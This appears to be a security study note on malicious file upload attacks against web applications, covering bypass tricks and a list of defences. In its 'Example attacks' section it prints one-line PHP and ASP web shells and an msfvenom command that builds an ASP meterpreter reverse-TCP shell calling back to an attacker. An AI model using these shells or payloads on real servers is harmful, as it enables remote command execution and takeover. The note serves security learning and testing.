First, the attacker needs to upload code into the system. Then, the code needs to be executed somehow. The application should validate the extension of a file and the content/type mime. Attacker can bypass the protection by adding two file extensions.

There are basically two ways a web application can be attacked by a malicious file upload.

1) Type of file:

A file might be able overwrite an existing file with the same name on the server. If this is an important file, the new file can cause the web app's to malfunction. Also, the new file can be used to replace a page or edit the application's settings so the further attacks can be done more easily.

2) Content of file:

An uploaded file into a web app can have malicious code in the form of an exploit, etc, for example, which could be used to control the server. The file could contain JavaScript scripts or tags that may exploit other vulnerabilities, such as a html file can trigger a XSS, for example.

Other ways to attack:

• By uploading a huge file, the server could be exhausted.
• If a file can be accessed with a URL path, the file can be executed right after being uploaded.
• Adding two file extensions
• Adding spaces or dots into filename

Defense

• File extension whitelist
• Validation of user input (for example: do not allow 2 file extensions or space or dots in the filename)
• filename should have a maximum length and the file should have a maximum size
• The directory for uploaded files should be outside of the root
• Scan the uploaded files before opening them
• Web app should rename the files

Example attacks

server-side code attack - rce

• JSP, JSPX, ASP, ASPX, PHP, py

attacker uploads webshell

php

<?php echo shell_exec($_GET['cmd']); ?> // TODO: update this with working webshell, this may not work.

asp

Can generate with msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

asp

<% eval request("cmd") %>

client-side code attack

• HTML, HTM, js

miscellaneous

• tons of small files - can lead to DoS
• huge files - file space denial of service
• file using malicious path or name - overwrite a critical file
• .exe file - victims download trojaned executable
• Executables, office documents with virus - machines get infected

Content-Type

# images
image/jpeg


# audio

# scripts potentially
application/javascript
text/html
application/xhtml+xml

Php code review

• start at the "Source"
  • $_FILES

Reports

• https://hackerone.com/reports/304098 : uses "," to bypass the file extension any, text/html -> text/html

Resources

• https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types/Complete_list_of_MIME_types
• https://stackoverflow.com/questions/23714383/what-are-all-the-possible-values-for-http-content-type-header
• http://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation/
• https://www.owasp.org/index.php/Test_Upload_of_Malicious_Files_(OTG-BUSLOGIC-009)
• https://www.owasp.org/index.php/Unrestricted_File_Upload
• https://www.computerweekly.com/answer/File-upload-security-best-practices-Block-a-malicious-file-upload